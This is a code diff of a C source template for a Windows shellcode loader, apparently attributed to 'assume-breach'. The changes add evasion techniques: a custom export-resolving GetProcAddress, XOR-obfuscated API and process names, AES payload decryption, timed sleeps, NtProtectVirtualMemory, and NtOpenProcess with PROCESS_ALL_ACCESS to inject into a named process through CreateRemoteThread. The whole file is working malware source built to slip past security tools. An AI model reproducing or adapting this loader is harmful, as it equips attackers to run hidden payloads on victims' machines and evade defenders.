|
|
@@ -5,13 +5,51 @@
|
|
|
#include <tlhelp32.h>
|
|
|
#include <wincrypt.h>
|
|
|
#pragma comment (lib, "crypt32.lib")
|
|
|
-#pragma comment (lib, "advapi32")
|
|
|
+#pragma comment (lib, "advapi32.lib")
|
|
|
#include <psapi.h>
|
|
|
+#include <winternl.h>
|
|
|
+#include <winnt.h>
|
|
|
+
|
|
|
+EXTERN_C NTSTATUS NTAPI NtProtectVirtualMemory(
|
|
|
+ HANDLE ProcessHandle,
|
|
|
+ PVOID* BaseAddress,
|
|
|
+ PSIZE_T RegionSize,
|
|
|
+ ULONG NewProtect,
|
|
|
+ PULONG OldProtect
|
|
|
+);
|
|
|
+
|
|
|
+EXTERN_C NTSTATUS NTAPI NtOpenProcess(
|
|
|
+ PHANDLE ProcessHandle,
|
|
|
+ ACCESS_MASK DesiredAccess,
|
|
|
+ POBJECT_ATTRIBUTES ObjectAttributes,
|
|
|
+ PCLIENT_ID ClientId
|
|
|
+);
|
|
|
+
|
|
|
+// Custom GetProcAddress function
|
|
|
+typedef FARPROC(__stdcall* ARPROC)(HMODULE, LPCSTR);
|
|
|
+
|
|
|
+FARPROC myGetProcAddress(HMODULE hModule, LPCSTR lpProcName) {
|
|
|
+ PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)hModule;
|
|
|
+ PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)((BYTE*)hModule + dosHeader->e_lfanew);
|
|
|
+ PIMAGE_EXPORT_DIRECTORY exportDirectory = (PIMAGE_EXPORT_DIRECTORY)((BYTE*)hModule +
|
|
|
+ ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
|
|
|
+
|
|
|
+ DWORD* addressOfFunctions = (DWORD*)((BYTE*)hModule + exportDirectory->AddressOfFunctions);
|
|
|
+ WORD* addressOfNameOrdinals = (WORD*)((BYTE*)hModule + exportDirectory->AddressOfNameOrdinals);
|
|
|
+ DWORD* addressOfNames = (DWORD*)((BYTE*)hModule + exportDirectory->AddressOfNames);
|
|
|
+
|
|
|
+ for (DWORD i = 0; i < exportDirectory->NumberOfNames; ++i) {
|
|
|
+ if (strcmp(lpProcName, (const char*)hModule + addressOfNames[i]) == 0) {
|
|
|
+ return (FARPROC)((BYTE*)hModule + addressOfFunctions[addressOfNameOrdinals[i]]);
|
|
|
+ }
|
|
|
+ }
|
|
|
|
|
|
-static NTSTATUS(__stdcall *NtDelayExecution)(BOOL Alertable, PLARGE_INTEGER DelayInterval) = (NTSTATUS(__stdcall*)(BOOL, PLARGE_INTEGER)) GetProcAddress(GetModuleHandle("ntdll.dll"), "NtDelayExecution");
|
|
|
+ return NULL;
|
|
|
+}
|
|
|
|
|
|
-static NTSTATUS(__stdcall *ZwSetTimerResolution)(IN ULONG RequestedResolution, IN BOOLEAN Set, OUT PULONG ActualResolution) = (NTSTATUS(__stdcall*)(ULONG, BOOLEAN, PULONG)) GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwSetTimerResolution");
|
|
|
+static NTSTATUS(__stdcall *NtDelayExecution)(BOOL Alertable, PLARGE_INTEGER DelayInterval) = (NTSTATUS(__stdcall*)(BOOL, PLARGE_INTEGER))myGetProcAddress(GetModuleHandle("ntdll.dll"), "NtDelayExecution");
|
|
|
|
|
|
+static NTSTATUS(__stdcall *ZwSetTimerResolution)(IN ULONG RequestedResolution, IN BOOLEAN Set, OUT PULONG ActualResolution) = (NTSTATUS(__stdcall*)(ULONG, BOOLEAN, PULONG))myGetProcAddress(GetModuleHandle("ntdll.dll"), "ZwSetTimerResolution");
|
|
|
|
|
|
static void SleepShort(float milliseconds) {
|
|
|
static bool once = true;
|
|
|
@@ -26,148 +64,154 @@ static void SleepShort(float milliseconds) {
|
|
|
NtDelayExecution(false, &interval);
|
|
|
}
|
|
|
|
|
|
-unsigned char dKernel32[] = { 'k','e','r','n','e','l','3','2','.','d','l','l', 0x0 };
|
|
|
+unsigned char ofthekernel[] = { 'k','e','r','n','e','l','3','2','.','d','l','l', 0x0 };
|
|
|
|
|
|
-LPVOID (WINAPI * Virt_Alloc)( LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
|
|
|
+LPVOID(WINAPI* Alooccc_Virtuu)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
|
|
|
|
|
|
-char XOR_VARIABLE []= "XOR_KEY";
|
|
|
+char XOR_VARIABLE[] = "XOR_KEY";
|
|
|
|
|
|
-unsigned char fRandom6 []=VIRALO};
|
|
|
-unsigned char Random9[]=PROCY};
|
|
|
+unsigned char fRandom6[] = VIRALO};
|
|
|
+unsigned char Random9[] = PROCY};
|
|
|
|
|
|
-int aRandom1(char * eRandom5, unsigned int eRandom5_len, char * key, size_t keylen) {
|
|
|
- HCRYPTPROV hProv;
|
|
|
- HCRYPTHASH hHash;
|
|
|
- HCRYPTKEY hKey;
|
|
|
+int aRandom1(char* eRandom5, unsigned int eRandom5_len, char* key, size_t keylen) {
|
|
|
+ HCRYPTPROV hProv;
|
|
|
+ HCRYPTHASH hHash;
|
|
|
+ HCRYPTKEY hKey;
|
|
|
|
|
|
- if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)){
|
|
|
- return -1;
|
|
|
- }
|
|
|
- if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)){
|
|
|
- return -1;
|
|
|
- }
|
|
|
- if (!CryptHashData(hHash, (BYTE*)key, (DWORD)keylen, 0)){
|
|
|
- return -1;
|
|
|
- }
|
|
|
- if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0,&hKey)){
|
|
|
- return -1;
|
|
|
- }
|
|
|
-
|
|
|
- if (!CryptDecrypt(hKey, (HCRYPTHASH) NULL, 0, 0, eRandom5, &eRandom5_len)){
|
|
|
- return -1;
|
|
|
- }
|
|
|
-
|
|
|
- CryptReleaseContext(hProv, 0);
|
|
|
- CryptDestroyHash(hHash);
|
|
|
- CryptDestroyKey(hKey);
|
|
|
-
|
|
|
- return 0;
|
|
|
-}
|
|
|
+ if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
|
|
|
+ return -1;
|
|
|
+ }
|
|
|
+ if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
|
|
|
+ return -1;
|
|
|
+ }
|
|
|
+ if (!CryptHashData(hHash, (BYTE*)key, (DWORD)keylen, 0)) {
|
|
|
+ return -1;
|
|
|
+ }
|
|
|
+ if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
|
|
|
+ return -1;
|
|
|
+ }
|
|
|
|
|
|
-int bRandom2(const char *procname) {
|
|
|
-
|
|
|
- HANDLE hProcSnap;
|
|
|
- PROCESSENTRY32 pe32;
|
|
|
- int pid = 0;
|
|
|
-
|
|
|
- hProcSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
|
|
|
- if (INVALID_HANDLE_VALUE == hProcSnap) return 0;
|
|
|
-
|
|
|
- pe32.dwSize = sizeof(PROCESSENTRY32);
|
|
|
-
|
|
|
- if (!Process32First(hProcSnap, &pe32)) {
|
|
|
-// CloseHandle(hProcSnap);
|
|
|
- return 0;
|
|
|
- }
|
|
|
-
|
|
|
- while (Process32Next(hProcSnap, &pe32)) {
|
|
|
- if (lstrcmpiA(procname, pe32.szExeFile) == 0) {
|
|
|
- pid = pe32.th32ProcessID;
|
|
|
- break;
|
|
|
- }
|
|
|
- }
|
|
|
-
|
|
|
- CloseHandle(hProcSnap);
|
|
|
-
|
|
|
- return pid;
|
|
|
+ if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, eRandom5, &eRandom5_len)) {
|
|
|
+ return -1;
|
|
|
+ }
|
|
|
+
|
|
|
+ CryptReleaseContext(hProv, 0);
|
|
|
+ CryptDestroyHash(hHash);
|
|
|
+ CryptDestroyKey(hKey);
|
|
|
+
|
|
|
+ return 0;
|
|
|
}
|
|
|
|
|
|
+int bRandom2(const char* procname) {
|
|
|
+ HANDLE hProcSnap;
|
|
|
+ PROCESSENTRY32 pe32;
|
|
|
+ int pidNumber = 0;
|
|
|
|
|
|
-int cRandom3(HANDLE hProc, unsigned char * eRandom5, unsigned int eRandom5_len) {
|
|
|
+ hProcSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
|
|
|
+ if (INVALID_HANDLE_VALUE == hProcSnap) return 0;
|
|
|
|
|
|
- LPVOID pRemteCode = NULL;
|
|
|
- HANDLE hThread = NULL;
|
|
|
+ pe32.dwSize = sizeof(PROCESSENTRY32);
|
|
|
|
|
|
-
|
|
|
- pRemteCode = VirtualAllocEx(hProc, NULL, eRandom5_len, MEM_COMMIT, PAGE_EXECUTE_READ);
|
|
|
- WriteProcessMemory(hProc, pRemteCode, (PVOID)eRandom5, (SIZE_T)eRandom5_len, (SIZE_T *)NULL);
|
|
|
-
|
|
|
- hThread = CreateRemoteThread(hProc, NULL, 0, pRemteCode, NULL, 0, NULL);
|
|
|
- if (hThread != NULL) {
|
|
|
- WaitForSingleObject(hThread, 500);
|
|
|
- return 0;
|
|
|
+ if (!Process32First(hProcSnap, &pe32)) {
|
|
|
+ return 0;
|
|
|
+ }
|
|
|
+
|
|
|
+ while (Process32Next(hProcSnap, &pe32)) {
|
|
|
+ if (lstrcmpiA(procname, pe32.szExeFile) == 0) {
|
|
|
+ pidNumber = pe32.th32ProcessID;
|
|
|
+ break;
|
|
|
}
|
|
|
- return -1;
|
|
|
+ }
|
|
|
+
|
|
|
+ CloseHandle(hProcSnap);
|
|
|
+
|
|
|
+ return pidNumber;
|
|
|
}
|
|
|
|
|
|
-void gRandom7(char * tada, size_t tada_len, char * XOR_VARIABLE, size_t XOR_VARIABLE_len) {
|
|
|
- int r;
|
|
|
- r = 0;
|
|
|
- for (int i = 0; i < tada_len; i++) {
|
|
|
- if (r == XOR_VARIABLE_len - 1) r = 0;
|
|
|
+int cRandom3(HANDLE hProc, unsigned char* eRandom5, unsigned int eRandom5_len) {
|
|
|
+ LPVOID pRemteCode = NULL;
|
|
|
+ HANDLE hThread = NULL;
|
|
|
|
|
|
- tada[i] = tada[i] ^ XOR_VARIABLE[r];
|
|
|
- r++;
|
|
|
- }
|
|
|
+ pRemteCode = VirtualAllocEx(hProc, NULL, eRandom5_len, MEM_COMMIT, PAGE_EXECUTE_READ);
|
|
|
+ WriteProcessMemory(hProc, pRemteCode, (PVOID)eRandom5, (SIZE_T)eRandom5_len, NULL);
|
|
|
+
|
|
|
+ hThread = CreateRemoteThread(hProc, NULL, 0, pRemteCode, NULL, 0, NULL);
|
|
|
+ if (hThread != NULL) {
|
|
|
+ WaitForSingleObject(hThread, 500);
|
|
|
+ return 0;
|
|
|
+ }
|
|
|
+ return -1;
|
|
|
+}
|
|
|
+
|
|
|
+void gRandom7(char* tadas, size_t tadas_len, char* XOR_VARIABLE, size_t XOR_VARIABLE_len) {
|
|
|
+ int r;
|
|
|
+ r = 0;
|
|
|
+ for (int i = 0; i < tadas_len; i++) {
|
|
|
+ if (r == XOR_VARIABLE_len - 1) r = 0;
|
|
|
+
|
|
|
+ tadas[i] = tadas[i] ^ XOR_VARIABLE[r];
|
|
|
+ r++;
|
|
|
+ }
|
|
|
}
|
|
|
|
|
|
+unsigned char eRandom5[] = PAYVAL
|
|
|
|
|
|
int main(void) {
|
|
|
- void * Random8_mem;
|
|
|
- BOOL rv;
|
|
|
- HANDLE th;
|
|
|
+ void* Random8_mem;
|
|
|
+ BOOL rv;
|
|
|
+ HANDLE th;
|
|
|
DWORD oldprotect = 0;
|
|
|
-
|
|
|
- int pid = 0;
|
|
|
+
|
|
|
+ int pidNumber = 0;
|
|
|
HANDLE hProc = NULL;
|
|
|
- char dRandom4 []=KEYVALUE
|
|
|
- unsigned char eRandom5[] =PAYVAL
|
|
|
-
|
|
|
- unsigned int eRandom5_len = sizeof(eRandom5);
|
|
|
|
|
|
+ char dRandom4[] = KEYVALUE
|
|
|
+ unsigned int eRandom5_len = sizeof(eRandom5);
|
|
|
+
|
|
|
+ FreeConsole();
|
|
|
+
|
|
|
+ gRandom7((char*)fRandom6, sizeof(fRandom6), XOR_VARIABLE, sizeof(XOR_VARIABLE));
|
|
|
+
|
|
|
+ SleepShort(3000);
|
|
|
+
|
|
|
+ Alooccc_Virtuu = (LPVOID(WINAPI*)(HANDLE, LPVOID, SIZE_T, DWORD, DWORD))myGetProcAddress(GetModuleHandle(ofthekernel), fRandom6);
|
|
|
+
|
|
|
+ SleepShort(4000);
|
|
|
|
|
|
- FreeConsole;
|
|
|
+ Random8_mem = Alooccc_Virtuu(0, eRandom5_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
|
|
|
+ SleepShort(5000);
|
|
|
+ aRandom1((char*)eRandom5, eRandom5_len, dRandom4, sizeof(dRandom4));
|
|
|
|
|
|
- gRandom7((char *) fRandom6, sizeof (fRandom6), XOR_VARIABLE, sizeof(XOR_VARIABLE));
|
|
|
-
|
|
|
- SleepShort(3000);
|
|
|
+ memcpy(Random8_mem, eRandom5, eRandom5_len);
|
|
|
|
|
|
- Virt_Alloc= GetProcAddress(GetModuleHandle(dKernel32), fRandom6);
|
|
|
+ rv = NtProtectVirtualMemory(GetCurrentProcess(), &Random8_mem, NULL, PAGE_EXECUTE_READ, &oldprotect);
|
|
|
|
|
|
- SleepShort(4000);
|
|
|
+ SleepShort(6000);
|
|
|
|
|
|
- Random8_mem = Virt_Alloc(0, eRandom5_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
|
|
|
- SleepShort(5000);
|
|
|
- aRandom1((char *) eRandom5, eRandom5_len, dRandom4, sizeof(dRandom4));
|
|
|
-
|
|
|
- RtlCopyMemory(Random8_mem, eRandom5, eRandom5_len);
|
|
|
-
|
|
|
- rv = VirtualProtect(Random8_mem, eRandom5_len, PAGE_EXECUTE_READ, &oldprotect);
|
|
|
- SleepShort(6000);
|
|
|
+ gRandom7((char*)Random9, sizeof(Random9), XOR_VARIABLE, sizeof(XOR_VARIABLE));
|
|
|
|
|
|
- gRandom7((char *) Random9, sizeof (Random9), XOR_VARIABLE, sizeof(XOR_VARIABLE));
|
|
|
-
|
|
|
- pid = bRandom2(Random9);
|
|
|
+ pidNumber = bRandom2(Random9);
|
|
|
|
|
|
- if (pid) {
|
|
|
+ if (pidNumber) {
|
|
|
+ HANDLE hProc;
|
|
|
+ OBJECT_ATTRIBUTES objAttr;
|
|
|
+ CLIENT_ID clientId;
|
|
|
|
|
|
- hProc = OpenProcess( PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
|
|
|
- PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE,
|
|
|
- FALSE, (DWORD) pid);
|
|
|
+ clientId.UniqueProcess = (HANDLE)pidNumber;
|
|
|
+ clientId.UniqueThread = 0;
|
|
|
|
|
|
- if (hProc != NULL) {
|
|
|
- cRandom3(hProc, eRandom5, eRandom5_len);
|
|
|
- }
|
|
|
- }
|
|
|
- return 0;
|
|
|
+ InitializeObjectAttributes(&objAttr, NULL, 0, NULL, NULL);
|
|
|
+
|
|
|
+ NTSTATUS status = NtOpenProcess(&hProc, PROCESS_ALL_ACCESS, &objAttr, &clientId);
|
|
|
+
|
|
|
+ if (NT_SUCCESS(status)) {
|
|
|
+ cRandom3(hProc, eRandom5, eRandom5_len);
|
|
|
+
|
|
|
+ NtClose(hProc); // Close the handle when done
|
|
|
+ }
|
|
|
+ else {
|
|
|
+ // Handle error
|
|
|
+ }
|
|
|
+ }
|
|
|
+ return 0;
|
|
|
}
|
assume-breach